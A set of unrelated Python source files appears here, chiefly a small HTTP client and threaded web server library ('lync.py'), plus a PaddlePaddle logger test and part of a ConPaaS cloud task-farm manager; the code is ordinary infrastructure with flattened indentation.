if self._connection_manager.live:
_logger.info(msg, self, r)
else:
_logger.debug(msg, self, r)
def _inner_close(self):
raise NotImplementedError()
def _write(self, buf):
raise NotImplementedError()
def __eq__(self, other):
return isinstance(other, Connection) and self._id == other._id
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return self._id
class DefaultAddressProvider(object):
"""Provides initial addresses for client to find and connect to a node.
It also provides a no-op translator.
"""
def __init__(self, addresses):
self._addresses = addresses
def load_addresses(self):
"""Returns the possible primary and secondary member addresses to connect to."""
configured_addresses = self._addresses
if not configured_addresses:
configured_addresses = ["127.0.0.1"]
primaries = []
secondaries = []
for address in configured_addresses:
p, s = AddressHelper.get_possible_addresses(address)
primaries.extend(p)
secondaries.extend(s)
return primaries, secondaries
def translate(self, address):
"""No-op address translator.
It is there to provide the same API with other address providers.
"""
return address
|
lync.py
|
import sys
import traceback
import socket
import ssl
import time
import urlparse
import re
import functools
import threading
__VERSION__ = '0.1'
def url_encode(s, encoding='utf-8'):
""" Encode s with percentage-encoding. """
eb = bytearray()
for b in bytearray(s.encode(encoding)):
if b >= 126 or not (97 <= b <= 122 or 65 <= b <= 90 or 48 <= b <= 57 or 45 <= b <= 46 or b == 95):
eb.extend("%%%02x" % b)
else:
eb.append(b)
return str(eb)
def url_decode(s):
""" Decode a string in percentage-encoding. """
original = bytearray()
pos = 0
eb = bytearray(s, encoding='utf-8')
eblen = len(eb)
while pos < eblen:
b = eb[pos]
if b == 37: # ASCII code of '%' is 37
original.append(int(s[pos+1:pos+3], 16))
pos += 2
elif b == 43: # ASCII code of '+' is 43
original.append(' ')
else:
original.append(b)
pos += 1
return str(original)
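# Quick illustrative round trip through the two helpers above (not part of the
# original module; the sample string is arbitrary).
def _example_url_roundtrip():
    encoded = url_encode('name with spaces & symbols')
    # url_decode also turns '+' into a space, matching form-encoded query values
    return url_decode(encoded) == 'name with spaces & symbols'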
def url_parse_queries(url):
queries = {}
try:
for q in url.split('?', 1)[1].split('#', 1)[0].split('&'):
kv = q.split('=', 1)
queries[kv[0].strip()] = url_decode(kv[1].strip()) if len(kv) > 1 else ''
except:
pass
return queries
def url_fetch_secure(url, keyfile, certfile, ca_certs, method='GET', headers=None, data=None,
max_redirection=0, limit=10485760):
u = urlparse.urlparse(url)
port = u.port
if u.scheme != 'http' and u.scheme != 'https':
raise AssertionError('unsupported url scheme.')
if not port:
port = 443 if u.scheme == 'https' else 80
req = HTTPRequest(method=method, path=url[len(u.scheme)+3+len(u.netloc):])
if method == 'POST' and data:
req.data = data
if headers:
        for k, v in headers.items():
            req.headers.append(k, v)
if req.data:
req.headers['Content-Length'] = len(req.data)
if 'Host' not in req:
# Make 'Host' the first header.
req.headers.insert(0, 'Host', u.netloc)
req['Connection'] = 'close'
if 'User-Agent' not in req:
req['User-Agent'] = 'AppleWebKit/537.36'
conn = socket.create_connection((u.hostname, port))
if u.scheme == 'https':
conn = ssl.wrap_socket(conn, keyfile=keyfile, certfile=certfile, ca_certs=ca_certs)
writer = HTTPStreamWriter(conn)
writer.write_request(req)
reader = HTTPStreamReader(conn)
resp = reader.read_response(data_part=True, limit=limit)
conn.close()
if max_redirection > 0 and 301 <= resp.status <= 302:
if 'Location' not in resp:
raise HTTPBadStreamError('bad redirection.')
jmpurl = resp.headers['Location']
return url_fetch_secure(jmpurl, keyfile, certfile, ca_certs, method, headers, data, max_redirection-1, limit)
return resp
def url_fetch(url, method='GET', headers=None, data=None, max_redirection=0, limit=10485760):
return url_fetch_secure(url, None, None, None, method, headers, data, max_redirection, limit)
def html_escape(s):
if not s:
return ''
    return s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
class HTTPEOFError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPEOFError, self).__init__(args, kwargs)
class HTTPNetworkError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPNetworkError, self).__init__(args, kwargs)
class HTTPBadStreamError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPBadStreamError, self).__init__(args, kwargs)
class HTTPSizeTooLargeError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPSizeTooLargeError, self).__init__(args, kwargs)
class HTTPHeaders(object):
def __init__(self):
self._items = []
def __contains__(self, item):
return self.find(item) != -1
def __setitem__(self, key, value):
value = str(value)
i = self.find(key)
        if i < 0:
            self.append(key, value)
        else:
            self._items[i] = (key, value)
def __getitem__(self, item):
i = self.find(item)
if i < 0:
raise IndexError(str(item) + ' not found')
return self._items[i][1]
def __len__(self):
return len(self._items)
def __str__(self):
s = ['{']
for kv in self._items:
s.append('\'%s\': \'%s\', ' % (str(kv[0]), str(kv[1])))
if self._items:
            s[len(self._items)] = s[len(self._items)][:-2]  # remove trailing comma and space
s.append('}')
return ''.join(s)
def get(self, key, default=None):
i = self.find(key)
return self.at(i) if i >= 0 else default
def at(self, i):
return self._items[i][1]
def items(self):
return self._items
def insert(self, i, k, v):
self._items.insert(i, (k, str(v)))
def append(self, k, v):
self._items.append((k, str(v)))
def pop(self, i=-1):
self._items.pop(i)
def remove(self, key):
i = self.find(key)
while i >= 0:
self.pop(i)
i = self.find(key, i)
def find(self, key, start=0):
end = len(self._items)
if start < end:
key = key.lower()
for i in range(start, end):
if self._items[i][0].lower() == key:
return i
return -1
def find_all(self, key, start=0):
lv = []
end = len(self._items)
if start < end:
key = key.lower()
for i in range(start, end):
if self._items[i][0].lower() == key:
lv.append(self._items[i][1])
return lv
def has(self, key, value, start=0):
value = str(value)
for i in range(start, len(self._items)):
if self._items[i] == (key, value):
return i
return -1
def split(self, key, col=';', eq='=', spaces=' '):
""" Splits a header value.
:param key: Name of the header field to be split.
:param col: column separator
:param eq: name/value separator within a column
:param spaces: white space characters that will be stripped.
:return: A dict object.
"""
i = self.find(key)
if i < 0:
return None
values = {}
for p in self._items[i][1].split(col):
kv = p.strip(spaces).split(eq, 1)
values[kv[0]] = kv[1] if len(kv) > 1 else ''
return values
@property
def content_length(self):
length = self.get('Content-Length')
return int(length) if length else None
@property
def content_type(self):
""" Get Content-Type void of parameters. """
ct = self.get('Content-Type')
if ct:
return ct.split(';', 1)[0].strip()
return ''
@property
def charset(self):
params = self.split('Content-Type')
return params.get('charset', '')
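# Illustrative sketch (not part of the module): how HTTPHeaders stores fields as an
# ordered list and how split() breaks a parameterised value apart. The header value
# below is hypothetical.
def _example_split_content_type():
    headers = HTTPHeaders()
    headers.append('Content-Type', 'text/html; charset=utf-8')
    # -> {'text/html': '', 'charset': 'utf-8'}
    return headers.split('Content-Type')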
class HTTPRequest(object):
def __init__(self, method='GET', path='/', version='HTTP/1.1', headers=None, data=''):
self.method = method
self.path = path
self.version = version
self.headers = HTTPHeaders()
if headers:
for k, v in headers.items():
self.headers.append(k, v)
self.data = data
def __str__(self):
        return self.format(data_part=True)
def __contains__(self, key):
return self.headers.__contains__(key)
def __getitem__(self, key):
return self.headers.__getitem__(key)
def __setitem__(self, key, value):
return self.headers.__setitem__(key, value)
@property
def startline(self):
return '%s %s %s' % (self.method, self.path, self.version)
@property
def plainpath(self):
q = self.path.find('?')
return url_decode(self.path if q < 0 else self.path[:q])
def format(self, data_part=True):
parts = ['%s %s %s\r\n' % (self.method, self.path, self.version)]
for k, v in self.headers.items():
parts.append(k + ': ' + str(v) + '\r\n')
parts.append('\r\n')
if data_part:
parts.append(self.data)
return ''.join(parts)
class HTTPResponse(object):
def __init__(self, status=200, phrases='OK', version='HTTP/1.1', headers=None, data=''):
self.status = status
self.phrases = phrases
self.version = version
self.headers = HTTPHeaders()
if headers:
for k, v in headers.items():
self.headers.append(k, str(v))
self.data = data
def __str__(self):
return self.format(data_part=True)
def __contains__(self, key):
return self.headers.__contains__(key)
def __getitem__(self, key):
return self.headers.__getitem__(key)
def __setitem__(self, key, value):
return self.headers.__setitem__(key, value)
@property
def statusline(self):
return '%s %d %s' % (self.version, self.status, self.phrases)
def format(self, data_part=True):
parts = ['%s %d %s\r\n' % (self.version, self.status, self.phrases)]
for k, v in self.headers.items():
parts.append(k + ': ' + str(v) + '\r\n')
parts.append('\r\n')
if data_part:
parts.append(self.data)
return ''.join(parts)
class HTTPStreamReader(object):
def __init__(self, sock):
self._sock = sock
self._buf = ''
def _recv(self):
try:
d = self._sock.recv(16384)
except:
raise HTTPNetworkError()
if not d:
raise HTTPEOFError('connection has been closed.')
return d
def read(self, count):
""" Read count bytes from the HTTP stream.
:param count: Number of bytes to read.
:return: A string, length of which is exactly count.
"""
while len(self._buf) < count:
self._buf += self._recv()
d = self._buf[:count]
self._buf = self._buf[count:]
return d
def read_some(self, max_count):
""" Read up to max_count bytes from the HTTP stream.
:param max_count: Maximum number of bytes to read.
:return: A string, length of which ranges from 1 to max_count.
"""
if not self._buf:
self._buf = self._recv()
q = min(max_count, len(self._buf))
d = self._buf[:q]
self._buf = self._buf[q:]
return d
def read_line(self, le='\r\n', limit=16384):
""" Read till a line ending sequence is encountered.
The line ending sequence is not included in the returned string.
This method raises an HTTPSizeTooLargeError when the length of the line exceeds the limit.
:param le: Line ending sequence, defaults to '\r\n'
:param limit: Maximum number of octets allowed.
:return: A string not including the line ending sequence.
"""
while True:
i = self._buf.find(le)
if i >= 0:
line = self._buf[:i]
self._buf = self._buf[i+2:]
return line
else:
if len(self._buf) >= limit:
raise HTTPSizeTooLargeError('line too long.')
self._buf += self._recv()
def read_chunk(self, limit=10485760):
""" Read a chunk from the HTTP stream.
        This method raises an HTTPSizeTooLargeError when the size of the chunk exceeds the limit.
        :param limit: Maximum number of octets allowed.
        :return: A string containing the chunk data.
"""
# See RFC7230 for more information about 'chunked' encoding.
# chunk = chunk-size [ chunk-ext ] CRLF
# chunk-data CRLF
# chunk-size = 1*HEXDIG
# last-chunk = 1*("0") [ chunk-ext ] CRLF
# chunk-data = 1*OCTET ; a sequence of chunk-size octets
try:
chunk_size = int(self.read_line(limit=10), 16)
except ValueError:
raise HTTPBadStreamError('invalid chunk head.')
if chunk_size == 0:
return ''
elif chunk_size < 0:
raise HTTPBadStreamError('negative chunk size.')
elif chunk_size > limit:
raise HTTPSizeTooLargeError('chunk too large.')
chunk = self.read(chunk_size)
if '\r\n' != self.read(2):
raise HTTPBadStreamError('invalid chunk ending.')
return chunk
@staticmethod
def _parse_status_line(l):
parts = l.split(' ', 2)
try:
ver = parts[0].strip()
code = int(parts[1].strip())
phr = parts[2].strip()
return ver, code, phr
except:
raise HTTPBadStreamError('bad status line.')
@staticmethod
def _parse_request_line(l):
parts = l.split(' ', 2)
try:
method = parts[0].strip()
path = parts[1].strip()
ver = parts[2].strip()
return method, path, ver
except:
raise HTTPBadStreamError('bad request line.')
@staticmethod
def _parse_header_line(l):
parts = l.split(':', 1)
try:
key = parts[0].strip()
value = parts[1].strip()
return key, value
except:
raise HTTPBadStreamError('bad header line.')
def read_request(self, data_part=True, limit=65536):
""" Extracts an HTTP request message from the stream.
        :param data_part: If data_part is set True, the entire message body will be loaded into the data field of
the returned HTTPRequest object. Otherwise, the message body is not extracted.
:param limit: Maximum number of octets allowed.
:return: An HTTPRequest object.
"""
req = HTTPRequest()
line = self.read_line(limit=limit)
req.method, req.path, req.version = self._parse_request_line(line)
while True:
limit -= len(line) + 2
line = self.read_line(limit=limit)
if not line:
break
k, v = self._parse_header_line(line)
req.headers.append(k, v)
if data_part and req.method == 'POST':
if 'Content-Length' in req:
# explicit sized
length = int(req['Content-Length'])
if length > limit:
raise HTTPSizeTooLargeError('entity size too large.')
req.data = self.read(length)
limit -= length
elif req.headers.has('Transfer-Encoding', 'chunked') >= 0:
# implied by 'chunked' encoding
data = []
chunk = self.read_chunk(limit=limit)
                while chunk:
                    limit -= len(chunk) + 2
                    data.append(chunk)
                    chunk = self.read_chunk(limit=limit)
req.data = ''.join(data)
# trailers
line = self.read_line(limit=limit)
while line:
k, v = self._parse_header_line(line)
req.headers.append(k, v)
else:
raise HTTPBadStreamError('indeterminate request body size.')
return req
def read_response(self, data_part=True, limit=65536):
""" Extracts an HTTP response message from the stream.
        :param data_part: If data_part is set True, the entire message body will be loaded into the data field of
the returned HTTPResponse object. Otherwise, the message body is not extracted.
:param limit: Maximum number of octets allowed.
:return: An HTTPResponse object.
"""
resp = HTTPResponse()
line = self.read_line(limit=limit)
resp.version, resp.status, resp.phrases = self._parse_status_line(line)
while True:
limit -= len(line) + 2
line = self.read_line(limit=limit)
if not line:
break
k, v = self._parse_header_line(line)
resp.headers.append(k, v)
if data_part:
if 'Content-Length' in resp:
# explicit sized
length = int(resp['Content-Length'])
if length > limit:
raise HTTPSizeTooLargeError('entity size too large.')
resp.data = self.read(length)
limit -= length
elif resp.headers.has('Transfer-Encoding', 'chunked') >= 0:
# implied by 'chunked' encoding
data = []
chunk = self.read_chunk(limit=limit)
                while chunk:
                    limit -= len(chunk) + 2
                    data.append(chunk)
                    chunk = self.read_chunk(limit=limit)
resp.data = ''.join(data)
# trailers
line = self.read_line(limit=limit)
limit -= len(line) + 2
while line:
k, v = self._parse_header_line(line)
resp.headers.append(k, v)
            elif resp.headers.has('Connection', 'close') >= 0 or resp.version == 'HTTP/1.0':
# implied by EOF
data = []
try:
while True:
data.append(self.read_some(limit))
limit -= len(data[-1])
except HTTPEOFError:
pass
resp.data = ''.join(data)
else:
raise HTTPBadStreamError('indeterminate response body size.')
return resp
class HTTPStreamWriter(object):
def __init__(self, sock):
self._sock = sock
def write(self, data):
while data:
n = self._sock.send(data)
if n < 1:
raise HTTPNetworkError('write to socket failed.')
data = data[n:]
def write_line(self, data):
self.write(data)
self.write('\r\n')
def write_chunk(self, chunk):
self.write('%x\r\n' % len(chunk))
self.write(chunk)
self.write('\r\n')
def write_request(self, req, data_part=True):
self.write(req.format(data_part=False))
if data_part:
self.write(req.data)
def write_response(self, resp, data_part=True):
self.write(resp.format(data_part=False))
if data_part:
self.write(resp.data)
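# Illustrative sketch of the chunked wire format produced by write_chunk above and
# consumed by HTTPStreamReader.read_chunk (not part of the module): each chunk is a
# hex size line, the data, and CRLF; a zero-size chunk plus an empty trailer section
# terminates the body.
def _example_chunked_body(chunks):
    parts = ['%x\r\n%s\r\n' % (len(c), c) for c in chunks if c]
    parts.append('0\r\n\r\n')  # last-chunk plus empty trailer section
    return ''.join(parts)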
class HTTPGenericError(Exception, HTTPResponse):
def __init__(self, status=200, phrases='OK'):
Exception.__init__(self)
HTTPResponse.__init__(self, status, phrases)
class HTTPMovedPermanently(HTTPGenericError):
def __init__(self, location):
super(HTTPMovedPermanently, self).__init__(301, 'Moved Permanently')
self.headers.append('Location', location)
class HTTPMovedTemporarily(HTTPGenericError):
def __init__(self, location):
super(HTTPMovedTemporarily, self).__init__(302, 'Found')
self.headers.append('Location', location)
class HTTPBadRequest(HTTPGenericError):
def __init__(self):
super(HTTPBadRequest, self).__init__(400, 'Bad Request')
class HTTPNotFound(HTTPGenericError):
def __init__(self):
super(HTTPNotFound, self).__init__(404, 'Not Found')
class HTTPServerError(HTTPGenericError):
def __init__(self):
super(HTTPServerError, self).__init__(500, 'Server Error')
class HTTPBadGateway(HTTPGenericError):
def __init__(self):
super(HTTPBadGateway, self).__init__(502, 'Bad Gateway')
class WebSessionContext(object):
def __init__(self, sock):
self.input = HTTPStreamReader(sock)
self.output = HTTPStreamWriter(sock)
self.request = None
self.response = None
self.error = None
# Number of requests received from current connection.
# The web server increases this counter automatically, web applications may
# not modify this field.
self.request_count = 0
# Application specific data. This field is valid along with the connection.
self.data = None
# If do_not_reply is set True, the web server will not send the response
# message to the client. In case the response message has been sent within
# the request handler, this flag should be set to True.
# ***This field is reset per request.***
self.do_not_reply = False
# If do_not_modify is set True, the web server will forward the response
# message to the client without any modification. By default, the web
# server checks the response message for missing headers and adds extra
# fields to the message, like 'Content-Type', 'Content-Length', etc., before
# sending it to the client.
# ***This field is reset per request.***
self.do_not_modify = False
# keep_alive indicates whether the connection should be kept alive.
# If keep_alive is set to False, the web server will close the connection
# immediately after the response message is sent.
self.keep_alive = True
# switch_protocol indicates whether the connection has been taken over by
# other protocols. If switch_protocol is set to True, the web server will
# not operate the connection any further, thus it's the web application's
# obligation to manage the connection.
# A typical scenario of using this field is handling a CONNECT request.
self.switch_protocol = False
def update(self, request):
self.do_not_modify = False
self.do_not_reply = False
self.error = None
self.request = request
self.response = HTTPResponse(200, 'OK')
self.request_count += 1
class WebApplication(object):
""" Decorates a class to make it a web application. """
def __init__(self, root='/', host='*'):
if not root.endswith('/'):
root += '/'
self.root = root
self.host = host
self.entries = {}
def __call__(self, klass):
""" When WebApplication object is used as decorator, this method will be called.
:param klass: The class to be decorated.
:return: The decorated class.
"""
klass.webapp = WebApplication(root=self.root, host=self.host)
for name, handler in klass.__dict__.items():
if type(handler) == WebApplicationHandler:
handler.name = name
klass.webapp.register(handler)
return klass
def register(self, handler):
""" Registers a handler
:param handler: WebApplicationHandler object, the handler to be registered.
"""
self.entries[handler.path] = handler
def map(self, context):
""" Maps a request to a handler.
:param context: The session context.
:return: The name of the handler, a string.
"""
req = context.request
        # Remove the leading application root from the path
handler_path = req.path[len(self.root)-1:]
# For relative paths, the query part and fragment part should be removed
if req.path[0] == '/':
q = handler_path.find('?')
if q >= 0:
handler_path = handler_path[:q]
for handler in self.entries.values():
if req.method == handler.method:
# Use naive string compare in strict mode, in this case handler.pathre is None
if (handler.pathre is None and handler.path == handler_path) or\
(handler.pathre and handler.pathre.match(handler_path)):
return handler
return None
class WebApplicationHandler(object):
""" Decorates a method to make it a request handler. """
def __init__(self, func=None, pattern='/', strict=True, method='GET'):
"""
:param func: Name of the handler method.
:param pattern: Pattern of paths that the handler bounds to.
:param strict: Use strict matching mode or not.
:param method: HTTP method that the handler accepts.
"""
self.path = pattern
self.pathre = re.compile(pattern) if not strict else None
self.name = ''
self.func = func
self.method = method
def __get__(self, instance, owner):
""" This method is called when WebApplicationHandler is used as a descriptor. """
return functools.partial(self.func, instance)
def __call__(self, func):
""" This method is called when a descriptor is required. """
return WebApplicationHandler(func, self.path, self.pathre is None, self.method)
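# A minimal, hypothetical web application wired together with the two decorators
# above (illustrative only; the paths and response body are made up). The handler
# receives the session context plus the parsed query parameters, and the server can
# be started with something like:
#   server = WebServer(logging); server.install(_ExampleApp()); server.run()
@WebApplication(root='/demo')
class _ExampleApp(object):
    @WebApplicationHandler(pattern='/hello', method='GET')
    def hello(self, context, **queries):
        name = html_escape(queries.get('name', 'world'))
        context.response.data = '<h1>hello, %s</h1>' % name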
def WebServerConfiguration():
""" Generates a default WebServer configuration.
:return: a dict object.
"""
conf = {
WebServer.CONF_SERVER_LISTEN: 'localhost:8080',
WebServer.CONF_THREAD_POOL_SIZE: 4,
WebServer.CONF_SERVER_NAME: 'lync',
WebServer.CONF_DEFAULT_CONTENT_TYPE: 'text/html; charset=utf-8',
WebServer.CONF_CONNECTION_TIMEOUT: 3000,
WebServer.CONF_MAX_KEEP_ALIVE: 0,
WebServer.CONF_MAX_MESSAGE_SIZE: 65536,
WebServer.CONF_HIDE_EXCEPT_INFO: True
}
return conf
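# Illustrative tweak of the default configuration returned above (keys are the
# CONF_* constants defined on WebServer below; the values here are hypothetical).
def _example_configuration():
    conf = WebServerConfiguration()
    conf[WebServer.CONF_SERVER_LISTEN] = '0.0.0.0:9090'
    conf[WebServer.CONF_THREAD_POOL_SIZE] = 8
    return conf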
class WebServer(object):
""" Container for web applications. """
# configuration keys
CONF_SERVER_LISTEN = 'server.listen'
CONF_THREAD_POOL_SIZE = 'server.thread-pool-size'
CONF_SERVER_NAME = 'server.name'
CONF_DEFAULT_CONTENT_TYPE = 'server.default-content-type'
CONF_CONNECTION_TIMEOUT = 'server.connection-timeout'
CONF_MAX_KEEP_ALIVE = 'server.max-keep-alive'
CONF_MAX_MESSAGE_SIZE = 'server.max-message-size'
CONF_HIDE_EXCEPT_INFO = 'server.hide-except-info'
def __init__(self, logging, conf=None):
self.logging = logging
self.conf = conf if conf else WebServerConfiguration()
self._apps = []
self._acceptor = None
self._acceptor_guard = threading.Event()
def install(self, app, root=None):
""" Installs a web application.
:param app: Web application object.
:param root: Path that the application should be installed to.
"""
if root:
app.webapp.root = root if root.endswith('/') else root + '/'
self._apps.append((app.webapp.root, app))
self.logging.info('web application installed: ' + app.webapp.root)
def remove(self, root):
""" Removes a web application.
:param root: Root path of the application to be removed.
"""
if not root.endswith('/'):
root += '/'
for i in range(0, len(self._apps)):
if self._apps[i][0] == root:
self._apps.pop(i)
self.logging.info('web application removed: ' + root)
return True
return False
def run(self):
ap = self.conf[WebServer.CONF_SERVER_LISTEN].strip().split(':', 1)
address = (ap[0], int(ap[1]) if len(ap) == 2 else 80)
self.logging.info('launching web server %s:%d ...' % address)
try:
acceptor = socket.socket()
acceptor.bind(address)
acceptor.listen(4)
        except Exception as e:
self.logging.error('ACCESS DENIED!!! web server can not start.')
self.logging.error(str(e))
return
self._acceptor = acceptor
self._acceptor_guard.set()
threads = []
for i in range(0, self.conf[WebServer.CONF_THREAD_POOL_SIZE]):
threads.append(threading.Thread(target=self._server_thread))
threads[i].start()
self.logging.info('---- web server is online now. ----')
for th in threads:
th.join()
def _map(self, context):
""" Find the app that is capable of handling the request.
:return: An (app, handler) tuple.
"""
req = context.request
host = req.headers.get('Host')
for path, app in self._apps:
if (app.webapp.host == '*' or app.webapp.host == host) and req.path.startswith(path):
return app, app.webapp.map(context)
return None, None
def _server_thread(self):
while True:
self._acceptor_guard.wait()
client, addr = self._acceptor.accept()
client.settimeout(self.conf[WebServer.CONF_CONNECTION_TIMEOUT])
self._acceptor_guard.set()
max_msg_size = self.conf[WebServer.CONF_MAX_MESSAGE_SIZE]
max_keep_alive = self.conf[WebServer.CONF_MAX_KEEP_ALIVE]
context = WebSessionContext(client)
while True:
try:
context.update(context.input.read_request(limit=max_msg_size))
context.keep_alive = max_keep_alive == 0 or max_keep_alive > context.request_count
req, res = context.request, context.response
app, handler = self._map(context)
if not handler:
self.logging.info('handler not found for: ' + req.startline)
context.response = HTTPNotFound()
else:
try:
queries = url_parse_queries(req.path)
handler.func(app, context, **queries)
except HTTPGenericError as e:
context.response = e
except Exception as e:
context.keep_alive = False
context.response = HTTPServerError()
stacktrace = traceback.format_exc().encode('utf-8', 'ignore')
self.logging.error(str(e))
                            self.logging.error(stacktrace)
if not self.conf[WebServer.CONF_HIDE_EXCEPT_INFO]:
context.response.data = stacktrace
context.response['Content-Type'] = 'text/plain; charset=utf-8'
if not context.do_not_reply:
self._reply(context)
self.logging.info('%d %s' % (context.response.status, req.startline))
except HTTPSizeTooLargeError as e:
context.output.write_response(HTTPBadRequest())
context.error = e
context.keep_alive = False
except Exception as e:
context.error = e
context.keep_alive = False
if not context.keep_alive:
try:
client.close()
                    except Exception as e:
self.logging.error('error close connection: ' + str(e))
break # end this session
if context.switch_protocol:
# The connection has been taken over by other protocols.
# It's other protocols' obligation to close the connection when the
# connection is no longer used.
self.logging.info('protocol switched %s:%d.' % (addr[0], addr[1]))
break
def _reply(self, context):
req, res = context.request, context.response
if context.do_not_modify:
context.output.write_response(res)
return
server = self.conf.get(WebServer.CONF_SERVER_NAME, '')
if server:
res['Server'] = server
if res.status == 200 and req.method in ['GET', 'HEAD', 'POST']:
res['Date'] = time.asctime() + ' ' + time.tzname[0]
if res.data:
res['Content-Length'] = len(res.data)
if 'Content-Type' not in res:
res['Content-Type'] = self.conf[WebServer.CONF_DEFAULT_CONTENT_TYPE]
else:
if req.method in ['GET', 'POST'] and 'Content-Length' not in res:
res['Content-Length'] = 0
if not context.keep_alive:
res['Connection'] = 'close'
context.output.write_response(res)
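    # Illustrative example (not part of the original code): for a 200 GET response
    # with a body and keep-alive disabled, _reply above typically ends up adding
    #   Server: <CONF_SERVER_NAME, if configured>
    #   Date: <current time>
    #   Content-Length: <len(res.data)>
    #   Content-Type: <CONF_DEFAULT_CONTENT_TYPE, unless the handler set one>
    #   Connection: close
    # before handing the response to context.output.write_response().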
if __name__ == '__main__':
r = url_fetch('http://example.com/')
print(r)
|
logger_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from parl.utils import logger
import threading as th
class TestLogger(unittest.TestCase):
def test_set_level(self):
logger.set_level(logger.INFO)
logger.set_dir('./test_dir')
logger.debug('debug')
logger.info('info')
logger.warning('warn')
logger.error('error')
def test_thread_info(self):
def thread_func():
logger.info('test thread')
th_list = []
for i in range(10):
t = th.Thread(target=thread_func)
t.start()
th_list.append(t)
for t in th_list:
t.join()
if __name__ == '__main__':
unittest.main()
|
manager.py
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.htc.agent import client
from conpaas.services.htc.manager.worker import Worker
from conpaas.services.htc.manager.taskfarm import TaskFarm, UnknownHtcTypeError, UnimplementedHtcCombinationError
from conpaas.services.htc.manager.configuration import Configuration
import node_info
import os
import sys
import time
import pprint
pp = pprint.PrettyPrinter(indent=4,stream=sys.stderr)
#import json
#import random
class HTCManager(BaseManager):
"""Manager class with the following exposed methods:
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
RWCT = 'RemoteWallClockTime'
MT = 'MATCH_EXP_MachineCloudMachineType'
def __init__(self, config_parser, **kwargs):
"""Initialize a HTC Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('htc')
self.con = True
self.hub_ip = None
types = []
costs = []
limits = []
types.append(self.config_parser.get('iaas', 'INST_TYPE'))
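        # COST_PER_TIME appears to be a string of the form '$ 0.12/hour' (this is
        # inferred from the slicing below, which extracts the number between the
        # '$ ' prefix and the '/').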
cpt = self.config_parser.get('iaas', 'COST_PER_TIME')
i = cpt.index('/')
s = cpt.index('$')
c = cpt[s+2:i]
costs.append(float(c))
limits.append(int(self.config_parser.get('iaas', 'MAX_VMS')))
for cloud in self.controller.get_clouds():
types.append(self.config_parser.get(cloud.cloud_name, 'INST_TYPE'))
cpt = self.config_parser.get(cloud.cloud_name, 'COST_PER_TIME')
i = cpt.index('/')
s = cpt.index('$')
c = cpt[s+2:i]
costs.append(float(c))
limits.append(int(self.config_parser.get(cloud.cloud_name, 'MAX_VMS')))
self.configuration = Configuration(types,costs,limits)
self.logger.info(self.configuration.costs)
self.logger.info(self.configuration.keys)
self.logger.info(self.configuration.limits)
# random.seed()
# for t in types:
# self.configuration.set_average(t, 2 * random.uniform(0,1))
# self.configuration.relevant_time_unit(20)
# self.configuration.compute_throughput()
# self.configuration.dynamic_configuration()
self.pool={}
self.files=[]
@expose('POST')
def startup(self, kwargs):
self.logger.info("HTC Manager starting up")
self.logger.info(str(kwargs))
if self.state != self.S_INIT and self.state != self.S_STOPPED:
vals = { 'curstate': self.state, 'action': 'startup' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
if 'cloud' in kwargs:
try:
self._init_cloud(kwargs['cloud'])
except Exception:
return HttpErrorResponse(
"A cloud named '%s' could not be found" % kwargs['cloud'])
#self.logger.info('Get service TaskFarm')
try:
self.service = TaskFarm(kwargs['mode'], kwargs['type'])
except (UnknownHtcTypeError, UnimplementedHtcCombinationError) as e:
return HttpErrorResponse({ 'error': e.__str__() })
#self.logger.info('Got service TaskFarm, delete some kwargs entries')
self.state = self.S_PROLOGUE
del kwargs['type']
del kwargs['mode']
#del kwargs['m_type']
#self.logger.info('Show leftover kwargs entries')
self.logger.info(str(kwargs))
#self.logger.info('Starting Thread for startup')
Thread(target=self._do_startup, kwargs=kwargs).start()
self.logger.info(str(self.service))
return HttpJsonResponse({ 'state': self.state })
#def _do_startup(self, cloud, m_type):
def _do_startup(self, cloud):
"""Start up the service. The first node will be an agent running a
HTC Hub and a HTC Node."""
#self.logger.info("_do_startup(%s)" % cloud)
startCloud = self._init_cloud(cloud)
m_type = self.config_parser.get(startCloud.cloud_name, 'INST_TYPE') # 'default' may have been replaced by 'iaas'
#self.logger.info("_do_startup(%s)" % cloud)
self.logger.info(str(self.controller.get_clouds()))
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT, startCloud)
hub_node = nodes[0]
# The first agent is a HTC Hub and a HTC Node
client.create_hub(hub_node.ip, self.AGENT_PORT)
client.create_node(hub_node.ip, self.AGENT_PORT, hub_node.ip)
self.logger.info("Added node %s: %s " % (hub_node.id, hub_node.ip))
node_info.add_node_info('/etc/hosts', hub_node.ip, hub_node.id)
node = hub_node
worker = Worker(node.id, node.ip, node.private_ip, node.cloud_name, m_type)
self.service.add_worker(worker, int(node.id))
self.hub_ip = hub_node.ip
# Extend the nodes list with the newly created one
self.nodes += nodes
if m_type in self.pool:
self.pool[m_type]+=1
else:
self.pool[m_type]=1
self.state = self.S_RUNNING
        except Exception as err:
self.logger.exception('_do_startup: Failed to create hub: %s' % err)
self.state = self.S_ERROR
@expose('POST')
def shutdown(self, kwargs):
"""Switch to EPILOGUE and call a thread to delete all nodes"""
# Shutdown only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'shutdown' }
